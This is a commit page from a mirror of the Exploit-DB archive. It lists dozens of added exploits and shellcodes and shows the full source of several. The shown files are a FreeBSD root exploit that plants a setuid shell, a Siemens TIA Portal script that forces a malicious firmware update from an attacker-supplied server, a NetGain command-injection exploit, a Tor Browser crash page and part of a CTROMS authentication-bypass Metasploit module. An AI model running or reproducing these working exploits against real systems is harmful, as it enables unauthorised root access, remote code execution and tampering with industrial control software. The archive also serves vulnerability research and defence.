bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-06-19

Browse source 
51 changes to exploits/shellcodes

Tor Browser < 0.3.2.10 - Use After Free (PoC)
Notepad++ < 7.7 (x64)  - Denial of Service
SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service
InputMapper 1.6.10 - Denial of Service

SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)

XnConvert 1.82 - Denial of Service (PoC)

SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)

SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)

Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)

FreeBSD 12.0 - 'fd' Local Privilege Escalation
iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation
Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH)

DeviceViewer 3.12.0.1 - Arbitrary Password Change

Winrar 5.80 - XML External Entity Injection

Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution

Siemens TIA Portal - Remote Command Execution

Android 7 < 9 - Remote Code Execution
CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)
CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)
CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit)

MyBB < 1.8.21 - Remote Code Execution

Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation

Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)

Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery

Publisure Hybrid - Multiple Vulnerabilities

NetGain EM Plus 10.1.68 - Remote Command Execution

Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection

WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion

DotNetNuke 9.3.2 - Cross-Site Scripting

VehicleWorkshop 1.0 - 'bookingid' SQL Injection
WordPress Plugin Tutor.1.5.3 - Local File Inclusion
WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
WordPress Plugin Wordfence.7.4.5 - Local File Disclosure
WordPress Plugin contact-form-7 5.1.6 - Remote File Upload

WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion

WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting

WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
Joomla! 3.9.0 < 3.9.7 - CSV Injection
PlaySMS 1.4.3 - Template Injection / Remote Code Execution
Wing FTP Server - Authenticated CSRF (Delete Admin)

WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification

UADMIN Botnet 1.0 - 'link' SQL Injection

Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload

Wordpress Plugin PicUploader 1.0 - Remote File Upload

PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution

WordPress Plugin Helpful 2.4.11 - SQL Injection

Prestashop 1.7.6.4 - Cross-Site Request Forgery

WordPress Plugin Simple File List 5.4 - Remote Code Execution

Library CMS Powerful Book Management System 2.2.0 - Session Fixation

Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)
Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection

Beauty Parlour Management System 1.0 - Authentication Bypass

Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)

Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)
Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes)

Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
This commit is contained in:
Offensive Security 2020-06-19 05:02:01 +00:00
parent 7312a8330d
commit 1979df6cb3
53 changed files with 5229 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
exploits/android/remote/47157.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: Android 7-9 - Remote Code Execution
# Date: [date]
# Exploit Author: Marcin Kozlowski
# Version: 7-9
# Tested on: Android
# CVE : 2019-2107
CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns ....
With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2)
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47157.zip

678
exploits/freebsd/local/47081.sh Executable file
View file

@ -0,0 +1,678 @@
#!/bin/sh
# Exploit script for FreeBSD-SA-19:02.fd
#
# Author: Karsten König of Secfault Security
# Contact: karsten@secfault-security.com
# Twitter: @gr4yf0x
# Kudos: Maik, greg and Dirk for discussion and inspiration
#
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
umask 0000
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
cp /etc/libmap.conf ./
cat > heavy_cyber_weapon.c << EOF
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <pthread_np.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/cpuset.h>
#include <sys/event.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/sysctl.h>
#include <sys/types.h>
#include <sys/un.h>
#define N_FDS 0xfe
#define N_OPEN 0x2
#define N 1000000
#define NUM_THREADS 400
#define NUM_FORKS 3
#define FILE_SIZE 1024
#define CHUNK_SIZE 1
#define N_FILES 25
#define SERVER_PATH "/tmp/sync_forks"
#define DEFAULT_PATH "/tmp/pwn"
#define HAMMER_PATH "/tmp/pwn2"
#define ATTACK_PATH "/etc/libmap.conf"
#define HOOK_LIB "libutil.so.9"
#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
#define CORE_0 0
#define CORE_1 1
#define MAX_TRIES 500
struct thread_data {
int fd;
int fd2;
};
pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
int send_recv(int fd, int sv[2], int n_fds) {
int ret, i;
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmh;
char cmsg[CMSG_SPACE(sizeof(int)*n_fds)];
int *fds; char buf[1];
iov.iov_base = "a";
iov.iov_len = 1;
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmsg;
msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds);
msg.msg_flags = 0;
cmh = CMSG_FIRSTHDR(&msg);
cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds);
cmh->cmsg_level = SOL_SOCKET;
cmh->cmsg_type = SCM_RIGHTS;
fds = (int *)CMSG_DATA(cmsg);
for (i = 0; i < n_fds; i++) {
fds[i] = fd;
}
ret = sendmsg(sv[0], &msg, 0);
if (ret == -1) {
return 1;
}
iov.iov_base = buf;
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmh;
msg.msg_controllen = CMSG_SPACE(0);
msg.msg_flags = 0;
ret = recvmsg(sv[1], &msg, 0);
if (ret == -1) {
return 1;
}
return 0;
}
int open_tmp(char *path)
{
int fd;
char *real_path;
if (path != NULL) {
real_path = malloc(strlen(path) + 1);
strcpy(real_path, path);
}
else {
real_path = malloc(strlen(DEFAULT_PATH) + 1);
strcpy(real_path, DEFAULT_PATH);
}
if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) {
perror("[!] open");
exit(1);
}
fchmod(fd, 0700);
return fd;
}
void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
bzero(remote, sizeof(struct sockaddr_un));
remote->sun_family = AF_UNIX;
strncpy(remote->sun_path, path, sizeof(remote->sun_path));
}
int bind_domain_socket(struct sockaddr_un *remote) {
int server_socket;
if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
if (bind(server_socket,
(struct sockaddr *) remote,
sizeof(struct sockaddr_un)) != 0) {
perror("[!] bind");
exit(1);
}
return server_socket;
}
int connect_domain_socket_client() {
int client_socket;
if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
return client_socket;
}
// Prevent panic at termination because f_count of the
// corrupted struct file is 0 at the moment this function
// is used but fd2 still points to the struct, hence fdrop()
// is called at exit and will panic because f_count will
// be below 0
//
// So we just use our known primitive to increase f_count
void prevent_panic(int sv[2], int fd)
{
send_recv(fd, sv, 0xfe);
}
int stick_thread_to_core(int core) {
/* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */
/* if (core_id < 0 || core_id >= num_cores) */
/* return EINVAL; */
cpuset_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(core, &cpuset);
pthread_t current_thread = pthread_self();
return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
}
void *trigger_uaf(void *thread_args) {
struct thread_data *thread_data;
int fd, fd2;
if (stick_thread_to_core(CORE_0) != 0) {
perror("[!] [!] trigger_uaf: Could not stick thread to core");
}
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = thread_data->fd2;
printf("[+] trigger_uaf: fd: %d\n", fd);
printf("[+] trigger_uaf: fd2: %d\n", fd2);
printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
pthread_mutex_lock(&trigger_mtx);
pthread_cond_wait(&trigger_cond, &trigger_mtx);
usleep(40);
// Close to fds to trigger uaf
//
// This assumes that fget_write() in kern_writev()
// was already successful!
//
// Otherwise kernel panic is triggered
//
// refcount = 2 (primitive+fget_write)
close(fd);
close(fd2);
// refcount = 0 => free
fd = open(ATTACK_PATH, O_RDONLY);
// refcount = 1
printf("[+] trigger_uaf: Opened read-only file, now hope\n");
printf("[+] trigger_uaf: Exit\n");
pthread_exit(NULL);
}
void *hammer(void *arg) {
int i, j, k, client_socket, ret;
char buf[FILE_SIZE], sync_buf[3];
FILE *fd[N_FILES];
struct sockaddr_un remote;
prepare_domain_socket(&remote, SERVER_PATH);
client_socket = connect_domain_socket_client();
strncpy(sync_buf, "1\n", 3);
for (i = 0; i < N_FILES; i++) {
unlink(HAMMER_PATH);
if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
perror("[!] fopen");
exit(1);
}
}
for (i = 0; i < FILE_SIZE; i++) {
buf[i] = 'a';
}
pthread_mutex_lock(&hammer_mtx);
// Sometimes sendto() fails because
// no free buffer is available
for (;;) {
if (sendto(client_socket,
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &remote,
sizeof(remote)) != -1) {
break;
}
}
pthread_cond_wait(&hammer_cond, &hammer_mtx);
pthread_mutex_unlock(&hammer_mtx);
for (i = 0; i < N; i++) {
for (k = 0; k < N_FILES; k++) {
rewind(fd[k]);
}
for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
for (k = 0; k < N_FILES; k++) {
if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
perror("[!] fwrite");
exit(1);
}
}
fflush(NULL);
}
}
pthread_exit(NULL);
}
// Works on UFS only
void *monitor_dirty_buffers(void *arg) {
int hidirtybuffers, numdirtybuffers;
size_t len;
len = sizeof(int);
if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
perror("[!] sysctlbyname hidirtybuffers");
exit(1);
};
printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
while(1) {
sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
if (numdirtybuffers >= hidirtybuffers) {
pthread_cond_signal(&write_cond);
pthread_cond_signal(&trigger_cond);
printf("[+] monitor: Reached hidirtybuffers watermark\n");
break;
}
}
pthread_exit(NULL);
}
int check_write(int fd) {
char buf[256];
int nbytes;
struct stat st;
printf("[+] check_write\n");
stat(DEFAULT_PATH, &st);
printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size);
stat(ATTACK_PATH, &st);
printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size);
nbytes = read(fd, buf, strlen(HOOK_LIB));
printf("[+] Read bytes: %d\n", nbytes);
if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
return 1;
}
else if (nbytes < 0) {
perror("[!] check_write:read");
printf("[!] check_write:Cannot check if it worked!");
return 1;
}
return 0;
}
void *write_to_file(void *thread_args) {
int fd, fd2, nbytes;
int *fd_ptr;
char buf[256];
struct thread_data *thread_data;
if (stick_thread_to_core(CORE_1) != 0) {
perror("[!] write_to_file: Could not stick thread to core");
}
fd_ptr = (int *) malloc(sizeof(int));
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = open(ATTACK_PATH, O_RDONLY);
printf("[+] write_to_file: Wait for signal from monitor\n");
pthread_mutex_lock(&write_mtx);
pthread_cond_wait(&write_cond, &write_mtx);
snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
nbytes = write(fd, buf, strlen(buf));
// Reopen directly after write to prevent panic later
//
// After the write f_count == 0 because after trigger_uaf()
// opened the read-only file, f_count == 1 and write()
// calls fdrop() at the end
//
// => f_count == 0
//
// A direct open hopefully assigns the now again free file
// object to fd so that we can prevent the panic with our
// increment primitive.
if ((fd = open_tmp(NULL)) == -1)
perror("[!] write_to_file: open_tmp");
*fd_ptr = fd;
if (nbytes < 0) {
perror("[!] [!] write_to_file:write");
} else if (nbytes > 0) {
printf("[+] write_to_file: We have written something...\n");
if (check_write(fd2) > 0)
printf("[+] write_to_file: It (probably) worked!\n");
else
printf("[!] write_to_file: It worked not :(\n");
}
printf("[+] write_to_file: Exit\n");
pthread_exit(fd_ptr);
}
void prepare(int sv[2], int fds[2]) {
int fd, fd2, i;
printf("[+] Start UaF preparation\n");
printf("[+] This can take a while\n");
// Get a single file descriptor to send via the socket
if ((fd = open_tmp(NULL)) == -1) {
perror("[!] open_tmp");
exit(1);
}
if ((fd2 = dup(fd)) == -1) {
perror("[!] dup");
exit(1);
}
// fp->f_count will increment by 0xfe in one iteration
// doing this 16909320 times will lead to
// f_count = 16909320 * 0xfe + 2 = 0xfffffff2
// Note the 2 because of the former call of dup() and
// the first open().
//
// To test our trigger we can send 0xd more fd's what
// would to an f_count of 0 when fdclose() is called in
// m_dispose_extcontrolm. fdrop() will reduce f_count to
// 0xffffffff = -1 and ultimately panic when _fdrop() is
// called because the latter asserts that f_count is 0.
// _fdrop is called in the first place because
// refcount_release() only checks that f_count is less or
// equal 1 to recognize the last reference.
//
// If we want to trigger the free without panic, we have
// to send 0xf fds and close an own what will lead to an
// fdrop() call without panic as f_count is 1 and reduced
// to 0 by close(). The unclosed descriptor references now
// a free 'struct file'.
for (i = 0; i < 16909320; i++) {
if (i % 1690930 == 0) {
printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093));
}
if (send_recv(fd, sv, N_FDS)) {
perror("[!] prepare:send_recv");
exit(1);
}
}
if (send_recv(fd, sv, 0xf)) {
perror("[!] prepare:send_recv");
exit(1);
}
fds[0] = fd;
fds[1] = fd2;
printf("[+] Finished UaF preparation\n");
}
void read_thread_status(int server_socket) {
int bytes_rec, count;
struct sockaddr_un client;
socklen_t len;
char buf[256];
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
setsockopt(server_socket,
SOL_SOCKET, SO_RCVTIMEO,
(const char*)&tv, sizeof tv);
for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
if (count % 100 == 0) {
printf("[+] Hammer threads ready: %d\n", count);
}
bzero(&client, sizeof(struct sockaddr_un));
bzero(buf, 256);
len = sizeof(struct sockaddr_un);
if ((bytes_rec = recvfrom(server_socket,
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] recvfrom");
break;
}
}
if (count != NUM_FORKS * NUM_THREADS) {
printf("[!] Could not create all hammer threads, will try though!\n");
}
}
void fire() {
int i, j, fd, fd2, bytes_rec, server_socket;
int sv[2], fds[2], hammer_socket[NUM_FORKS];
int *fd_ptr;
char socket_path[256], sync_buf[3], buf[256];
pthread_t write_thread, trigger_thread, monitor_thread;
pthread_t hammer_threads[NUM_THREADS];
pid_t pids[NUM_FORKS];
socklen_t len;
struct thread_data thread_data;
struct sockaddr_un server, client;
struct sockaddr_un hammer_socket_addr[NUM_FORKS];
// Socket for receiving thread status
unlink(SERVER_PATH);
prepare_domain_socket(&server, SERVER_PATH);
server_socket = bind_domain_socket(&server);
// Sockets to receive hammer signal
for (i = 0; i < NUM_FORKS; i++) {
snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
unlink(socket_path);
prepare_domain_socket(&hammer_socket_addr[i], socket_path);
hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
}
strncpy(sync_buf, "1\n", 3);
len = sizeof(struct sockaddr_un);
if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
perror("[!] socketpair");
exit(1);
}
pthread_mutex_init(&write_mtx, NULL);
pthread_mutex_init(&trigger_mtx, NULL);
pthread_cond_init(&write_cond, NULL);
pthread_cond_init(&trigger_cond, NULL);
pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
prepare(sv, fds);
fd = fds[0];
fd2 = fds[1];
thread_data.fd = fd;
thread_data.fd2 = fd2;
pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
for (j = 0; j < NUM_FORKS; j++) {
if ((pids[j] = fork()) < 0) {
perror("[!] fork");
abort();
}
else if (pids[j] == 0) {
pthread_mutex_init(&hammer_mtx, NULL);
pthread_cond_init(&hammer_cond, NULL);
close(fd);
close(fd2);
/* Prevent that a file stream in the hammer threads
* gets the file descriptor of fd for debugging purposes
*/
if ((fd = open_tmp("/tmp/dummy")) == -1)
perror("[!] dummy");
if ((fd2 = open_tmp("/tmp/dummy2")) == -1)
perror("[!] dummy2");
printf("[+] Fork %d fd: %d\n", j, fd);
printf("[+] Fork %d fd2: %d\n", j, fd2);
for (i = 0; i < NUM_THREADS; i++) {
pthread_create(&hammer_threads[i], NULL, hammer, NULL);
}
printf("[+] Fork %d created all threads\n", j);
if ((bytes_rec = recvfrom(hammer_socket[j],
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] accept");
abort();
}
pthread_cond_broadcast(&hammer_cond);
for (i = 0; i < NUM_THREADS; i++) {
pthread_join(hammer_threads[i], NULL);
}
pthread_cond_destroy(&hammer_cond);
pthread_mutex_destroy(&hammer_mtx);
exit(0);
} else {
printf("[+] Created child with PID %d\n", pids[j]);
}
}
read_thread_status(server_socket);
printf("[+] Send signal to Start Hammering\n");
for (i = 0; i < NUM_FORKS; i++) {
if (sendto(hammer_socket[i],
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &hammer_socket_addr[i],
sizeof(hammer_socket_addr[0])) == -1) {
perror("[!] sendto");
exit(1);
}
}
pthread_join(monitor_thread, NULL);
for (i = 0; i < NUM_FORKS; i++) {
kill(pids[i], SIGKILL);
printf("[+] Killed %d\n", pids[i]);
}
pthread_join(write_thread, (void **) &fd_ptr);
pthread_join(trigger_thread, NULL);
pthread_mutex_destroy(&write_mtx);
pthread_mutex_destroy(&trigger_mtx);
pthread_cond_destroy(&write_cond);
pthread_cond_destroy(&trigger_cond);
printf("[+] Returned fd: %d\n", *fd_ptr);
prevent_panic(sv, *fd_ptr);
// fd was acquired from write_to_file
// which allocs a pointer for it
free(fd_ptr);
}
int main(int argc, char **argv)
{
setbuf(stdout, NULL);
fire();
return 0;
}
EOF
cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c
cat > program.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
if (!geteuid())
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
}
EOF
cc -o program.o -c program.c -fPIC
cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "[+] Firing the Heavy Cyber Weapon"
./heavy_cyber_weapon
su
if [ -f /tmp/xxxx ]; then
echo "[+] Enjoy!"
echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
/tmp/xxxx
else
echo "[!] FAIL"
fi

51
exploits/hardware/remote/47083.py Executable file
View file

@ -0,0 +1,51 @@
##
# Exploit Title: Siemens TIA Portal unauthenticated remote command execution
# Date: 06/11/2019
# Exploit Author: Joseph Bingham
# CVE : CVE-2019-10915
# Vendor Homepage: www.siemens.com
# Software Link: https://new.siemens.com/global/en/products/automation/industry-software/automation-software/tia-portal.html
# Version: TIA Portal V15 Update 4
# Tested on: Windows 10
# Advisory: https://www.tenable.com/security/research/tra-2019-33
# Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a
# Affected Vendors/Device/Firmware:
# - Siemens STEP7 / TIA Portal
##
##
# Example usage
# $ python cve_2019_10915_tia_portal_rce.py
# Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}'
# Received '40'
# Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]'
##
import websocket, ssl, argparse
parser = argparse.ArgumentParser()
parser.add_argument("target_host", help="TIA Portal host")
parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int)
parser.add_argument("(optional) update_server", help="Malicious firmware update server IP")
args = parser.parse_args()
host = args.target_host
port = args.target_port
updatesrv = args.update_server
ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE})
# Read current proxy settings
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]'
# Change application proxy settings
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]'
# Force a malicious firmware update
req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]'
ws.send(req)
result = ws.recv()
print("Received '%s'" % result)
result = ws.recv()
print("Received '%s'" % result)
result = ws.recv()
print("Received '%s'" % result)

18
exploits/ios/local/47409.txt Normal file
View file

@ -0,0 +1,18 @@
Exploit Title: SockPuppet 3
Date: September 8, 2019
Exploit Author: Umang Raghuvanshi
Vendor Homepage: https://apple.com
Software Link: https://ipsw.me/
Version: iOS 11.0—12.2, iOS 12.4
Tested on: iOS 11.0—12.2, iOS 12.4
CVE: CVE-2019-8605
This is an alternative (and complete) exploit for CVE-2019-8605. I have only implemented the exploit and do not claim any rights for discovering and/or publishing the vulnerability. The actual exploit code is in “SockPuppet3.cpp”, other files are either helpers or documentation. This exploit [1] has already been verified in production several times [2] [3], however, I can assist in additional verification if required.
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47409.zip
[1] https://gist.github.com/ur0/a9b2d8088479a70665f729c4e9bf8720
[2] https://twitter.com/Pwn20wnd/status/1163392040073191426
[3] https://twitter.com/electra_team/status/1163658714840047618

71
exploits/jsp/webapps/47391.go Executable file
View file

@ -0,0 +1,71 @@
/********************************************************************************
# Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthorized Local File Inclusion
# Date: 15 September 2019
# Exploit Author: azams / @TheRealAzams
# Vendor Homepage: http://netgain-systems.com
# Software Link: http://www.netgain-systems.com/free/
# Version: v10.1.68
# Tested on: Linux
#
# Install golang: https://golang.org/doc/install
# Compile exploit: go build exploit.go
# Run exploit without compiling: go run exploit.go
# Shouts: Rix, Channisa, Ridho7ul & Horangi!
*********************************************************************************/
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strings"
)
var (
target string
port string
cmd string
)
func main() {
for i := range os.Args {
if os.Args[i] == "-u" {
target = os.Args[i+1]
} else if os.Args[i] == "-p" {
port = os.Args[i+1]
} else if os.Args[i] == "-cmd" {
cmd = os.Args[i+1]
}
}
if target != "" || port != "" || cmd != "" {
cmd = "type=sh&content=%232Fbin%2Fsh%0Aecho+'0xdeadnoob'%0a" + cmd + "%0aecho+'0xdeadnoob'&args=&count=0&ip=localhost"
status, body := exploit()
if strings.Contains(status, "200") {
fmt.Println("Status Code: " + status)
result := strings.Split(body, "0xdeadnoob")
fmt.Println("Result: \n" + strings.Trim(result[1], "\n"))
return
}
fmt.Println("Exploit failed!")
} else {
fmt.Println("Usage: ./exploit -u http://127.0.0.1 -p 8181 -cmd 'id;'")
}
}
func exploit() (string, string) {
tbTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}
client := &http.Client{Transport: tbTransport}
datas, err := url.ParseQuery(cmd)
req, err := http.NewRequest("POST", target+":"+port+"/u/jsp/designer/script_test.jsp", strings.NewReader(datas.Encode()))
req.Header.Set("Content-type", "application/x-www-form-urlencoded")
resp, err := client.Do(req)
if err != nil {
panic(err)
}
defer resp.Body.Close()
body, _ := ioutil.ReadAll(resp.Body)
return resp.Status, string(body)
}

30
exploits/linux/dos/44994.html Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Tor Browser - Use After Free (PoC)
# Date: 09.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.torproject.org/
# Software Link: https://www.torproject.org/download/download-easy.html.en
# Version: Tor 0.3.2.x before 0.3.2.10
# Tested on: Kali Linux
# CVE : CVE-2018-0491
#Run exploit, result DOS
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>

131
exploits/linux/remote/48196.txt Normal file
View file

@ -0,0 +1,131 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CTROMS Terminal OS - Port Portal "Password Reset" Authentication Bypass' ,
'Description' => %q{
This module exploits an authentication bypass in CTROMS, triggered by password reset verification code disclosure.
In order to exploit this vulnerability, the username must be known.
Exploiting this vulnerability create a new password for the user you specified and present it to you.
The "verification code" and "cookie generate" functions required to reset the password contain vulnerability.
When the "userId" parameter is posted to "getverificationcode.jsp", a verification code is transmitted to the account's phone number for password reset.
But this verification code written in the database is also reflected in the response of the request.
The first vector would be to use this verification code.
The second vector is the "rand" cookie values returned in this request. These values are md5.
If these values are assigned in the response, password reset can be done via these cookie values.
Ex: [ Cookie: 6fb36ecf2a04b8550ba95603047fe85=fae0bKBGtKBKtKh.wKA.vLBmuLxmuM.; 34d1c350632806406ecc517050da0=b741baa96686a91d4461145e40a9c2df ]
},
'References' =>
[
[ 'CVE', '' ],
[ 'URL', 'https://www.pentest.com.tr/exploits/CTROMS-Terminal-OS-Port-Portal-Password-Reset-Authentication-Bypass.html' ],
[ 'URL', 'https://www.globalservices.bt.com' ]
],
'Author' =>
[
'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
],
'License' => MSF_LICENSE,
'DisclosureDate' => "March 2 2020",
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Username']),
OptString.new('PASSWORD', [true, 'Password for the reset', Rex::Text.rand_text_alphanumeric(12)])
])
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def check
begin
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
